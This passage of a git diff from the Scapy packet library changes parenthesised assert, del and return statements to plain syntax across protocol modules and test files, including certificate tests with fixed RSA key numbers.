AssertionError """ ret = super(UVarIntField, self).any2i(pkt, x) - assert(not isinstance(ret, type(None)) and ret >= 0) + assert not isinstance(ret, type(None)) and ret >= 0 return ret def i2repr(self, pkt, x): @@ -568,8 +568,8 @@ def __init__(self, name, default, size, length_of, adjust=lambda x: x): :return: None :raises: AssertionError """ - assert(default is None or default >= 0) - assert(0 < size <= 8) + assert default is None or default >= 0 + assert 0 < size <= 8 super(FieldUVarLenField, self).__init__(name, default, size) self._length_of = length_of @@ -624,7 +624,7 @@ def _compute_value(self, pkt): fld, fval = pkt.getfield_and_val(self._length_of) val = fld.i2len(pkt, fval) ret = self._adjust(val) - assert(ret >= 0) + assert ret >= 0 return ret ############################################################################### @@ -1006,7 +1006,7 @@ def _huffman_encode_char(cls, c): if isinstance(c, EOS): return cls.static_huffman_code[-1] else: - assert(isinstance(c, int) or len(c) == 1) + assert isinstance(c, int) or len(c) == 1 return cls.static_huffman_code[orb(c)] @classmethod @@ -1033,7 +1033,7 @@ def huffman_encode(cls, s): ibl += padlen ret = i, ibl - assert(ret[0] >= 0) + assert ret[0] >= 0 assert (ret[1] >= 0) return ret @@ -1047,12 +1047,12 @@ def huffman_decode(cls, i, ibl): :return: str: the string decoded from the bitstring :raises: AssertionError, InvalidEncodingException """ - assert(i >= 0) - assert(ibl >= 0) + assert i >= 0 + assert ibl >= 0 if isinstance(cls.static_huffman_tree, type(None)): cls.huffman_compute_decode_tree() - assert(not isinstance(cls.static_huffman_tree, type(None))) + assert not isinstance(cls.static_huffman_tree, type(None)) s = [] j = 0 @@ -1106,8 +1106,8 @@ def huffman_conv2str(cls, bit_str, bit_len): :return: str: the converted bitstring as a bytestring. :raises: AssertionError """ - assert(bit_str >= 0) - assert(bit_len >= 0) + assert bit_str >= 0 + assert bit_len >= 0 byte_len = bit_len // 8 rem_bit = bit_len % 8 @@ -1141,8 +1141,8 @@ def huffman_conv2bitstring(cls, s): i = (i << 8) + orb(c) ret = i, ibl - assert(ret[0] >= 0) - assert(ret[1] >= 0) + assert ret[0] >= 0 + assert ret[1] >= 0 return ret @classmethod @@ -1271,9 +1271,9 @@ def any2i(self, pkt, x): :raises: AssertionError, InvalidEncodingException """ if isinstance(x, bytes): - assert(isinstance(pkt, packet.Packet)) + assert isinstance(pkt, packet.Packet) return self.m2i(pkt, x) - assert(isinstance(x, HPackStringsInterface)) + assert isinstance(x, HPackStringsInterface) return x def i2m(self, pkt, x): @@ -1469,7 +1469,7 @@ def get_data_len(self): padding_len_len = fld.i2len(self, fval) ret = self.s_len - padding_len_len - padding_len - assert(ret >= 0) + assert ret >= 0 return ret def pre_dissect(self, s): @@ -1550,7 +1550,7 @@ def get_hdrs_len(self): padding_len_len = fld.i2len(self, fval) ret = self.s_len - padding_len_len - padding_len - assert(ret >= 0) + assert ret >= 0 return ret def pre_dissect(self, s): @@ -1628,7 +1628,7 @@ def get_hdrs_len(self): (bit_cnt / 8) - weight_len ) - assert(ret >= 0) + assert ret >= 0 return ret def pre_dissect(self, s): @@ -1769,7 +1769,7 @@ def __init__(self, *args, **kwargs): """ # RFC7540 par6.5 p36 - assert( + assert ( len(args) == 0 or ( isinstance(args[0], bytes) and len(args[0]) % 6 == 0 @@ -1839,7 +1839,7 @@ def get_hdrs_len(self): padding_len - (bit_len / 8) ) - assert(ret >= 0) + assert ret >= 0 return ret def pre_dissect(self, s): @@ -1876,7 +1876,7 @@ def __init__(self, *args, **kwargs): :raises: AssertionError """ # RFC7540 par6.7 p42 - assert( + assert ( len(args) == 0 or ( isinstance(args[0], (bytes, str)) and len(args[0]) == 8 @@ -1919,7 +1919,7 @@ def __init__(self, *args, **kwargs): :raises: AssertionError """ # RFC7540 par6.9 p46 - assert( + assert ( len(args) == 0 or ( isinstance(args[0], (bytes, str)) and len(args[0]) == 4 @@ -2064,7 +2064,7 @@ def post_build(self, p, pay): # This logic, while awkward in the post_build and more reasonable in # a self_build is implemented here for performance tricks reason if self.getfieldval('len') is None: - assert(len(pay) < (1 << 24)), 'Invalid length: payload is too long' + assert len(pay) < (1 << 24), 'Invalid length: payload is too long' p = struct.pack('!L', len(pay))[1:] + p[3:] return super(H2Frame, self).post_build(p, pay) @@ -2123,7 +2123,7 @@ def __init__(self, name, value): """ :raises: AssertionError """ - assert(len(name) > 0) + assert len(name) > 0 self._name = name.lower() self._value = value @@ -2289,7 +2289,7 @@ def __getitem__(self, idx): raised :raises: KeyError, AssertionError """ - assert(idx >= 0) + assert idx >= 0 if idx > type(self)._static_entries_last_idx: idx -= type(self)._static_entries_last_idx + 1 if idx >= len(self._dynamic_table): @@ -2322,7 +2322,7 @@ def recap(self, nc): :param int nc: the new cap of the dynamic table (that is the maximum-maximum size) # noqa: E501 :raises: AssertionError """ - assert(nc >= 0) + assert nc >= 0 t = self._dynamic_table_cap_size > nc self._dynamic_table_cap_size = nc @@ -2341,7 +2341,7 @@ def _reduce_dynamic_table(self, new_entry_size=0): the RFC7541 definition of the size of an entry) :raises: AssertionError """ - assert(new_entry_size >= 0) + assert new_entry_size >= 0 cur_sz = len(self) dyn_tbl_sz = len(self._dynamic_table) while dyn_tbl_sz > 0 and cur_sz + new_entry_size > self._dynamic_table_max_size: # noqa: E501 @@ -2393,7 +2393,7 @@ def register(self, hdrs): # then throw an assertion error if the new entry does not fit in new_entry_len = len(entry) self._reduce_dynamic_table(new_entry_len) - assert(new_entry_len <= self._dynamic_table_max_size) + assert new_entry_len <= self._dynamic_table_max_size self._dynamic_table.insert(0, entry) def get_idx_by_name(self, name): diff --git a/scapy/contrib/igmpv3.py b/scapy/contrib/igmpv3.py index 9a85841ff12..110f5798cef 100644 --- a/scapy/contrib/igmpv3.py +++ b/scapy/contrib/igmpv3.py @@ -76,7 +76,7 @@ def encode_maxrespcode(self): else: exp = 0 value >>= 3 - while(value > 31): + while value > 31: exp += 1 value >>= 1 exp <<= 4 diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 3cbca2af77a..b0e52a0775a 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -364,10 +364,10 @@ for n in IKEv2TransformTypes: IKEv2Transforms[IKEv2TransformTypes[n][0]] = n -del(n) -del(e) -del(tmp) -del(val) +del n +del e +del tmp +del val # Note: Transform and Proposal can only be used inside the SA payload IKEv2_payload_type = ["None", "", "Proposal", "Transform"] diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index 1a85dc63056..4d197ffdf40 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -676,7 +676,7 @@ def getfield(self, pkt, s): if Padding in r: p = r[Padding] i.payload = p - del(r.payload) + del r.payload return r.load, i else: return b"", i diff --git a/scapy/contrib/pnio.py b/scapy/contrib/pnio.py index fd013385694..af3f54a85de 100644 --- a/scapy/contrib/pnio.py +++ b/scapy/contrib/pnio.py @@ -214,12 +214,12 @@ def get_padding_length(self): pad_len = len(self.getfieldval("padding")) # Constraints from IEC-61158-6-10/FDIS ED 3, Table 163 - assert(0 <= pad_len <= 40) + assert 0 <= pad_len <= 40 q = self while not isinstance(q, UDP) and hasattr(q, "underlayer"): q = q.underlayer if isinstance(q, UDP): - assert(0 <= pad_len <= 12) + assert 0 <= pad_len <= 12 return pad_len def next_cls_cb(self, _lst, _p, _remain): @@ -356,7 +356,7 @@ def get_max_data_length(): @staticmethod def build_PROFIsafe_class(cls, data_length): - assert(cls.get_max_data_length() >= data_length) + assert cls.get_max_data_length() >= data_length return type( "{}Len{}".format(cls.__name__, data_length), (cls,), diff --git a/scapy/contrib/sdnv.py b/scapy/contrib/sdnv.py index 5e497ce3b22..b1303626feb 100644 --- a/scapy/contrib/sdnv.py +++ b/scapy/contrib/sdnv.py @@ -54,7 +54,7 @@ def encode(self, number): temp.append(thisByte) foo = temp + foo - return(foo) + return foo def decode(self, ba, offset): number = 0 @@ -71,7 +71,7 @@ def decode(self, ba, offset): numBytes += 1 if (number > self.maxValue): raise SDNVValueError(self.maxValue) - return(number, numBytes) + return number, numBytes SDNVUtil = SDNV() diff --git a/scapy/fields.py b/scapy/fields.py index 43963c6b935..34ca52966f1 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1516,7 +1516,7 @@ def getfield(self, remain = b"" if conf.padding_layer in i: r = i[conf.padding_layer] - del(r.underlayer.payload) + del r.underlayer.payload remain = r.load return remain, i @@ -1764,7 +1764,7 @@ def getfield(self, pkt, s): if conf.padding_layer in p: pad = p[conf.padding_layer] remain = pad.load - del(pad.underlayer.payload) + del pad.underlayer.payload if self.next_cls_cb is not None: cls = self.next_cls_cb(pkt, lst, p, remain) if cls is not None: diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 44ec26e7614..2e2f832e462 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -369,9 +369,9 @@ def randval(self): else: n = v.name DHCPRevOptions[n] = (k, v) -del(n) -del(v) -del(k) +del n +del v +del k class RandDHCPOptions(RandField): @@ -635,7 +635,7 @@ def make_reply(self, req): repb.siaddr = self.gw repb.ciaddr = self.gw repb.giaddr = self.gw - del(repb.payload) + del repb.payload rep = Ether(dst=mac) / IP(dst=ip) / UDP(sport=req.dport, dport=req.sport) / repb # noqa: E501 return rep diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 9adee25b2c2..4230cbdc97a 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -615,7 +615,7 @@ def getfield(self, pkt, s): if conf.padding_layer in p: pad = p[conf.padding_layer] remain = pad.load - del(pad.underlayer.payload) + del pad.underlayer.payload else: remain = "" lst.append(p) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index cd26adbfa3a..11484c32f3d 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -253,7 +253,7 @@ def possible_shortens(dat): new_val = kept_string + replace_pointer rep[0].setfieldval(rep[1], new_val) try: - del(rep[0].rdlen) + del rep[0].rdlen except AttributeError: pass # End of the compression algorithm diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 924fcd8f294..bc5703fdea0 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1734,7 +1734,7 @@ def make_reply(self, p): ip = p.getlayer(IP) tcp = p.getlayer(TCP) pay = raw(tcp.payload) - del(p.payload.payload.payload) + del p.payload.payload.payload p.FCfield = "from-DS" p.addr1, p.addr2 = p.addr2, p.addr1 p /= IP(src=ip.dst, dst=ip.src) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index e2507daa039..eb12d1c78ac 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -704,7 +704,7 @@ def http_request(host, path="/", port=80, timeout=3, iptables_rule = "iptables -%c INPUT -s %s -p tcp --sport 80 -j DROP" if iptables: host = str(Net(host)) - assert(os.system(iptables_rule % ('A', host)) == 0) + assert os.system(iptables_rule % ('A', host)) == 0 sock = TCP_client.tcplink(HTTP, host, port, debug=verbose, iface=iface) else: @@ -724,7 +724,7 @@ def http_request(host, path="/", port=80, timeout=3, sock.close() if raw and iptables: host = str(Net(host)) - assert(os.system(iptables_rule % ('D', host)) == 0) + assert os.system(iptables_rule % ('D', host)) == 0 if ans: if display: if Raw not in ans: diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 5251b38202b..c1eeec8e2d2 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -639,9 +639,9 @@ def fragment(self, fragsize=1480): nb = (len(s) - lastfragsz + fragsize - 1) // fragsize + 1 for i in range(nb): q = p.copy() - del(q[fnb].payload) - del(q[fnb].chksum) - del(q[fnb].len) + del q[fnb].payload + del q[fnb].chksum + del q[fnb].len if i != nb - 1: q[fnb].flags |= 1 fragend = (i + 1) * fragsize @@ -1149,9 +1149,9 @@ def fragment(pkt, fragsize=1480): nb = (len(s) - lastfragsz + fragsize - 1) // fragsize + 1 for i in range(nb): q = p.copy() - del(q[IP].payload) - del(q[IP].chksum) - del(q[IP].len) + del q[IP].payload + del q[IP].chksum + del q[IP].len if i != nb - 1: q[IP].flags |= 1 fragend = (i + 1) * fragsize @@ -1177,7 +1177,7 @@ def overlap_frag(p, overlap, fragsize=8, overlap_fragsize=None): if overlap_fragsize is None: overlap_fragsize = fragsize q = p.copy() - del(q[IP].payload) + del q[IP].payload q[IP].add_payload(overlap) qfrag = fragment(q, overlap_fragsize) @@ -1194,7 +1194,7 @@ def _defrag_list(lst, defrag, missfrag): return p = p.copy() if conf.padding_layer in p: - del(p[conf.padding_layer].underlayer.payload) + del p[conf.padding_layer].underlayer.payload ip = p[IP] if ip.len is None or ip.ihl is None: clen = len(ip.payload) @@ -1212,14 +1212,14 @@ def _defrag_list(lst, defrag, missfrag): else: clen += q[IP].len - (q[IP].ihl << 2) if conf.padding_layer in q: - del(q[conf.padding_layer].underlayer.payload) + del q[conf.padding_layer].underlayer.payload txt.add_payload(q[IP].payload.copy()) if q.time > p.time: p.time = q.time else: ip.flags.MF = False - del(ip.chksum) - del(ip.len) + del ip.chksum + del ip.len p = p / txt p._defrag_pos = max(x._defrag_pos for x in lst) defrag.append(p) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index ba8e382b65b..2aba29b8cb9 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1099,7 +1099,7 @@ def defragment6(packets): min_pos = 0 min_offset = cur_offset res.append(lst[min_pos]) - del(lst[min_pos]) + del lst[min_pos] # regenerate the fragmentable part fragmentable = b"" @@ -1118,7 +1118,7 @@ def defragment6(packets): q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) del q[IPv6ExtHdrFragment].underlayer.payload q /= conf.raw_layer(load=fragmentable) - del(q.plen) + del q.plen if q[IPv6].underlayer: q[IPv6] = IPv6(raw(q[IPv6])) @@ -1149,8 +1149,8 @@ def fragment6(pkt, fragSize): frag = IPv6ExtHdrFragment(nh=layer3.nh) layer3.remove_payload() - del(layer3.nh) - del(layer3.plen) + del layer3.nh + del layer3.plen frag.add_payload(data) layer3.add_payload(frag) @@ -3382,7 +3382,7 @@ def IPv6inIP(dst='203.178.135.36', src=None): if not conf.L3socket == _IPv6inIP: _IPv6inIP.cls = conf.L3socket else: - del(conf.L3socket) + del conf.L3socket return _IPv6inIP @@ -3935,7 +3935,7 @@ def ra_reply_callback(req, reply_mac, tgt_mac, iface): while ICMPv6NDOptPrefixInfo in tmp: pio = tmp[ICMPv6NDOptPrefixInfo] tmp = pio.payload - del(pio.payload) + del pio.payload rep /= pio # ... and source link layer address option diff --git a/scapy/layers/isakmp.py b/scapy/layers/isakmp.py index d2f4e36d5ef..8726f3ee08a 100644 --- a/scapy/layers/isakmp.py +++ b/scapy/layers/isakmp.py @@ -103,10 +103,10 @@ for e in val[1]: tmp[val[1][e]] = e ISAKMPTransformNum[val[0]] = (n, tmp, val[2]) -del(n) -del(e) -del(tmp) -del(val) +del n +del e +del tmp +del val class ISAKMPTransformSetField(StrLenField): diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index f97c35001e4..dc318b8ed58 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -808,7 +808,7 @@ def echo(self, pkt): return self.cli_atmt.send(pkt) def start_client(self, **kwargs): - assert(self.cli_atmt), "Cannot start NTLM client: not provided" + assert self.cli_atmt, "Cannot start NTLM client: not provided" self.cli_atmt.client_pipe.send(kwargs) diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index 327ddeeb719..b46c9e3cf45 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -863,7 +863,7 @@ def getfield(self, pkt, s): remain = "" if conf.raw_layer in i: r = i[conf.raw_layer] - del(r.underlayer.payload) + del r.underlayer.payload remain = r.load return remain, i diff --git a/scapy/main.py b/scapy/main.py index 98b93d6c6fe..dd4e2c2b243 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -343,18 +343,18 @@ def save_session(fname="", session=None, pickleProto=-1): for k in list(to_be_saved): i = to_be_saved[k] if k[0] == "_": - del(to_be_saved[k]) + del to_be_saved[k] elif hasattr(i, "__module__") and i.__module__.startswith("IPython"): - del(to_be_saved[k]) + del to_be_saved[k] elif isinstance(i, ConfClass): - del(to_be_saved[k]) + del to_be_saved[k] elif k in ignore or k in hard_ignore: - del(to_be_saved[k]) + del to_be_saved[k] elif isinstance(i, (type, types.ModuleType)): if k[0] != "_": log_interactive.warning("[%s] (%s) can't be saved.", k, type(to_be_saved[k])) - del(to_be_saved[k]) + del to_be_saved[k] try: os.rename(fname, fname + ".bak") diff --git a/scapy/packet.py b/scapy/packet.py index 71e15f9beed..c0e806bace4 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -492,7 +492,7 @@ def __setattr__(self, attr, val): def delfieldval(self, attr): # type: (str) -> None if attr in self.fields: - del(self.fields[attr]) + del self.fields[attr] self.explicit = 0 # in case a default value must be explicit self.raw_packet_cache = None self.raw_packet_cache_fields = None @@ -1327,7 +1327,7 @@ def __getitem__(self, cls): def __delitem__(self, cls): # type: (Type[Packet]) -> None - del(self[cls].underlayer.payload) + del self[cls].underlayer.payload def __setitem__(self, cls, val): # type: (Type[Packet], Packet) -> None @@ -2003,7 +2003,7 @@ def split_top_down(lower, # type: Type[Packet] if any(k not in ofval or ofval[k] != v for k, v in six.iteritems(fval)): # noqa: E501 return upper._overload_fields = upper._overload_fields.copy() - del(upper._overload_fields[lower]) + del upper._overload_fields[lower] @conf.commands.register diff --git a/scapy/plist.py b/scapy/plist.py index bcd7b6c6f68..ad5995cb84a 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -794,8 +794,8 @@ def sr(self, multi=False, lookahead=None): remain[i]._answered = 1 remain[j]._answered = 2 continue - del(remain[j]) - del(remain[i]) + del remain[j] + del remain[i] i -= 1 break i += 1 diff --git a/scapy/route.py b/scapy/route.py index 5f801e8f466..3d0d51d006a 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -104,7 +104,7 @@ def delt(self, *args, **kargs): route = self.make_route(*args, **kargs) try: i = self.routes.index(route) - del(self.routes[i]) + del self.routes[i] except ValueError: raise ValueError("No matching route found!") diff --git a/scapy/route6.py b/scapy/route6.py index 4671a0ee571..00b4049e736 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -157,7 +157,7 @@ def delt(self, dst, gw=None): i = self.routes.index(to_del[0]) self.invalidate_cache() self.remove_ipv6_iface(self.routes[i][3]) - del(self.routes[i]) + del self.routes[i] def ifchange(self, iff, addr): # type: (str, str) -> None diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 3b2bb81335e..618b54c9519 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -404,7 +404,7 @@ def recv(self, x=MTU): pkt = self.basecls(data) # type: Packet pad = pkt.getlayer(conf.padding_layer) if pad is not None and pad.underlayer is not None: - del(pad.underlayer.payload) + del pad.underlayer.payload from scapy.packet import NoPayload while pad is not None and not isinstance(pad, NoPayload): x -= len(pad.load) @@ -444,7 +444,7 @@ def recv(self, x=65535): pad = pkt.getlayer(conf.padding_layer) if pad is not None and pad.underlayer is not None: - del(pad.underlayer.payload) + del pad.underlayer.payload while pad is not None and not isinstance(pad, scapy.packet.NoPayload): # noqa: E501 x -= len(pad.load) pad = pad.payload diff --git a/test/answering_machines.uts b/test/answering_machines.uts index bcdab421a5d..197ca4b2d38 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -21,8 +21,8 @@ def test_am(cls_name, packet_query, check_reply, mock_sniff, **kargs): = BOOT_am def check_BOOTP_am_reply(packet): - assert(BOOTP in packet and packet[BOOTP].op == 2) - assert(packet[BOOTP].yiaddr == "192.168.1.128" and packet[BOOTP].giaddr == "192.168.1.1") + assert BOOTP in packet and packet[BOOTP].op == 2 + assert packet[BOOTP].yiaddr == "192.168.1.128" and packet[BOOTP].giaddr == "192.168.1.1" test_am(BOOTP_am, Ether()/IP()/UDP()/BOOTP(op=1), @@ -31,8 +31,8 @@ test_am(BOOTP_am, = DHCP_am def check_DHCP_am_reply(packet): - assert(DHCP in packet and len(packet[DHCP].options)) - assert(("domain", "localnet") in packet[DHCP].options) + assert DHCP in packet and len(packet[DHCP].options) + assert ("domain", "localnet") in packet[DHCP].options test_am(DHCP_am, Ether()/IP()/UDP()/BOOTP(op=1)/DHCP(), @@ -41,8 +41,8 @@ test_am(DHCP_am, = ARP_am def check_ARP_am_reply(packet): - assert(ARP in packet and packet[ARP].psrc == "10.28.7.1") - assert(packet[ARP].hwsrc == "00:01:02:03:04:05") + assert ARP in packet and packet[ARP].psrc == "10.28.7.1" + assert packet[ARP].hwsrc == "00:01:02:03:04:05" test_am(ARP_am, Ether()/ARP(pdst="10.28.7.1"), @@ -53,8 +53,8 @@ test_am(ARP_am, = DNS_am def check_DNS_am_reply(packet): - assert(DNS in packet and packet[DNS].ancount == 1) - assert(packet[DNS].an.rdata == "192.168.1.1") + assert DNS in packet and packet[DNS].ancount == 1 + assert packet[DNS].an.rdata == "192.168.1.1" test_am(DNS_am, IP()/UDP()/DNS(qd=DNSQR(qname="www.secdev.org")), @@ -117,8 +117,8 @@ def test_WiFi_am(packet_query, check_reply, mock_sniff, **kargs): am() def check_WiFi_am_reply(packet): - assert(isinstance(packet, list) and len(packet) == 2) - assert(TCP in packet[0] and Raw in packet[0] and raw(packet[0][Raw]) == b"5c4pY") + assert isinstance(packet, list) and len(packet) == 2 + assert TCP in packet[0] and Raw in packet[0] and raw(packet[0][Raw]) == b"5c4pY" test_WiFi_am(Dot11(FCfield="to-DS")/IP()/TCP()/"Scapy", check_WiFi_am_reply, diff --git a/test/cert.uts b/test/cert.uts index eb0fa44badb..d75c89c5ac1 100644 --- a/test/cert.uts +++ b/test/cert.uts @@ -112,14 +112,14 @@ x_pubNum = x.pubkey.public_numbers() type(x) is PrivKeyRSA = PrivKey class : Checking public attributes -assert(x_pubNum.n == 19231328316532061413420367242571475005688288081144416166988378525696075445024135424022026378563116068168327239354659928492979285632474448448624869172454076124150405352043642781483254546569202103296262513098482624188672299255268092629150366527784294463900039290024710152521604731213565912934889752122898104556895316819303096201441834849255370122572613047779766933573375974464479123135292080801384304131606933504677232323037116557327478512106367095125103346134248056463878553619525193565824925835325216545121044922690971718737998420984924512388011040969150550056783451476150234324593710633552558175109683813482739004163) +assert x_pubNum.n == 19231328316532061413420367242571475005688288081144416166988378525696075445024135424022026378563116068168327239354659928492979285632474448448624869172454076124150405352043642781483254546569202103296262513098482624188672299255268092629150366527784294463900039290024710152521604731213565912934889752122898104556895316819303096201441834849255370122572613047779766933573375974464479123135292080801384304131606933504677232323037116557327478512106367095125103346134248056463878553619525193565824925835325216545121044922690971718737998420984924512388011040969150550056783451476150234324593710633552558175109683813482739004163 x_pubNum.e == 65537 = PrivKey class : Checking private attributes -assert(x_privNum.p == 140977881300857803928857666115326329496639762170623218602431133528876162476487960230341078724702018316260690172014674492782486113504117653531825010840338251572887403113276393351318549036549656895326851872473595350667293402676143426484331639796163189182788306480699144107905869179435145810212051656274284113969) -assert(x_privNum.q == 136413798668820291889092636919077529673097927884427227010121877374504825870002258140616512268521246045642663981036167305976907058413796938050224182519965099316625879807962173794483933183111515251808827349718943344770056106787713032506379905031673992574818291891535689493330517205396872699985860522390496583027) -assert(x_privNum.dmp1 == 46171616708754015342920807261537213121074749458020000367465429453038710215532257783908950878847126373502288079285334594398328912526548076894076506899568491565992572446455658740752572386903609191774044411412991906964352741123956581870694330173563737928488765282233340389888026245745090096745219902501964298369) -assert(x_privNum.dmq1 == 58077388505079936284685944662039782610415160654764308528562806086690474868010482729442634318267235411531220690585030443434512729356878742778542733733189895801341155353491318998637269079682889033003797865508917973141494201620317820971253064836562060222814287812344611566640341960495346782352037479526674026269) +assert x_privNum.p == 140977881300857803928857666115326329496639762170623218602431133528876162476487960230341078724702018316260690172014674492782486113504117653531825010840338251572887403113276393351318549036549656895326851872473595350667293402676143426484331639796163189182788306480699144107905869179435145810212051656274284113969 +assert x_privNum.q == 136413798668820291889092636919077529673097927884427227010121877374504825870002258140616512268521246045642663981036167305976907058413796938050224182519965099316625879807962173794483933183111515251808827349718943344770056106787713032506379905031673992574818291891535689493330517205396872699985860522390496583027 +assert x_privNum.dmp1 == 46171616708754015342920807261537213121074749458020000367465429453038710215532257783908950878847126373502288079285334594398328912526548076894076506899568491565992572446455658740752572386903609191774044411412991906964352741123956581870694330173563737928488765282233340389888026245745090096745219902501964298369 +assert x_privNum.dmq1 == 58077388505079936284685944662039782610415160654764308528562806086690474868010482729442634318267235411531220690585030443434512729356878742778542733733189895801341155353491318998637269079682889033003797865508917973141494201620317820971253064836562060222814287812344611566640341960495346782352037479526674026269 x_privNum.d == 15879630313397508329451198152673380989865598204237760057319927734227125481903063742175442230739018051313441697936698689753842471306305671266572085925009572141819112648211571007521954312641597446020984266846581125287547514750428503480880603089110687015181510081018160579576523796170439894692640171752302225125980423560965987469457505107324833137678663960560798216976668670722016960863268272661588745006387723814962668678285659376534048525020951633874488845649968990679414325096323920666486328886913648207836459784281744709948801682209478580185160477801656666089536527545026197569990716720623647770979759861119273292833 = PrivKey class : Importing PEM-encoded ECDSA private key @@ -153,17 +153,17 @@ a = PrivKeyRSA(b'0\x82\x04\xa3\x02\x01\x00\x02\x82\x01\x01\x00\x98Wj?\xe9\xd3\x1 a_privNum = a.key.private_numbers() a_pubNum = a.pubkey.public_numbers() -assert(x_pubNum.n == x_pubNum.n) -assert(x_pubNum.e == x_pubNum.e) +assert x_pubNum.n == x_pubNum.n +assert x_pubNum.e == x_pubNum.e -assert(x_privNum.p == a_privNum.p) -assert(x_privNum.q == a_privNum.q) -assert(x_privNum.dmp1 == a_privNum.dmp1) -assert(x_privNum.dmq1 == a_privNum.dmq1) -assert(x_privNum.d == a_privNum.d) +assert x_privNum.p == a_privNum.p +assert x_privNum.q == a_privNum.q +assert x_privNum.dmp1 == a_privNum.dmp1 +assert x_privNum.dmq1 == a_privNum.dmq1 +assert x_privNum.d == a_privNum.d = PrivKey class : Checking public attributes -assert(y.key.curve.name == "secp256k1") +assert y.key.curve.name == "secp256k1" y.key.public_key().public_numbers().y == 86290575637772818452062569410092503179882738810918951913926481113065456425840 = PrivKey class : Checking private attributes @@ -246,14 +246,14 @@ assert raw(c_resigned.signatureValue) == correct_sha1_sig = PrivKey/PubKey classes : Signing/Verifying with MD5_SHA1 hash m = "Testing our PKCS #1 legacy methods" # ignore this string s = x.sign(m, t="pkcs", h="md5-sha1") -assert(s == b"\x0cm\x8a\x8f\xae`o\xcdC=\xfea\xf4\xff\xf0i\xfe\xa3!\xfd\xa5=*\x99?\x08!\x03A~\xa3-B\xe8\xca\xaf\xb4H|\xa3\x98\xe9\xd5U\xfdL\xb1\x9c\xd8\xb2{\xa1/\xfcr\x8c\xa7\xd3\xa9%\xde\x13\xa8\xf6\xc6<\xc7\xdb\xe3\xa62\xeb\xe9?\xe5by\xc2\x9e\xad\xec\x92:\x14\xd96\xa8\xc0+\xea8'{=\x91$\xdf\xed\xe1+eF8\x9fI\x1f\xa1\xcb4s\xd1#\xdf\xa11\x88o\x050i Hg\x0690\xe6\xe8?\\<:k\x94\x82\x91\x0f\x06\xc7>ZQ\xc2\xcdn\xdb\xf4\x9d\x7f!\xa9>\xe8\xea\xb3\xd83]\x8d\x90\xd4\xa0b\xe6\xe6$d[\xe4\xb4 |W\xb2t\x8c\xb2\xd5>>+\xf1\xa6W'\xaf\xc2CU\x82\x13\xc4\x0b\xc4vD*\xc3\xef\xa6s\nQ\xe6\rS@B\xd2\xa4V\xdc\xd1D\x7f\x00\xaa\xac\xac\x96i\xf1kg*\xe9*\x90a@\xc8uDy\x16\xe2\x03\xd1\x9fa\xe2s\xdb\xees\xa4\x8cna\xba\xdaE\x006&\xa4") +assert s == b"\x0cm\x8a\x8f\xae`o\xcdC=\xfea\xf4\xff\xf0i\xfe\xa3!\xfd\xa5=*\x99?\x08!\x03A~\xa3-B\xe8\xca\xaf\xb4H|\xa3\x98\xe9\xd5U\xfdL\xb1\x9c\xd8\xb2{\xa1/\xfcr\x8c\xa7\xd3\xa9%\xde\x13\xa8\xf6\xc6<\xc7\xdb\xe3\xa62\xeb\xe9?\xe5by\xc2\x9e\xad\xec\x92:\x14\xd96\xa8\xc0+\xea8'{=\x91$\xdf\xed\xe1+eF8\x9fI\x1f\xa1\xcb4s\xd1#\xdf\xa11\x88o\x050i Hg\x0690\xe6\xe8?\\<:k\x94\x82\x91\x0f\x06\xc7>ZQ\xc2\xcdn\xdb\xf4\x9d\x7f!\xa9>\xe8\xea\xb3\xd83]\x8d\x90\xd4\xa0b\xe6\xe6$d[\xe4\xb4 |W\xb2t\x8c\xb2\xd5>>+\xf1\xa6W'\xaf\xc2CU\x82\x13\xc4\x0b\xc4vD*\xc3\xef\xa6s\nQ\xe6\rS@B\xd2\xa4V\xdc\xd1D\x7f\x00\xaa\xac\xac\x96i\xf1kg*\xe9*\x90a@\xc8uDy\x16\xe2\x03\xd1\x9fa\xe2s\xdb\xees\xa4\x8cna\xba\xdaE\x006&\xa4" x_pub = PubKey((x._pubExp, x._modulus, x._modulusLen)) x_pub.verify(m, s, t="pkcs", h="md5-sha1") = PrivKey/PubKey classes : Signing/Verifying with MD5_SHA1 hash with legacy support m = "Testing our PKCS #1 legacy methods" s = x._legacy_sign_md5_sha1(m) -assert(s == 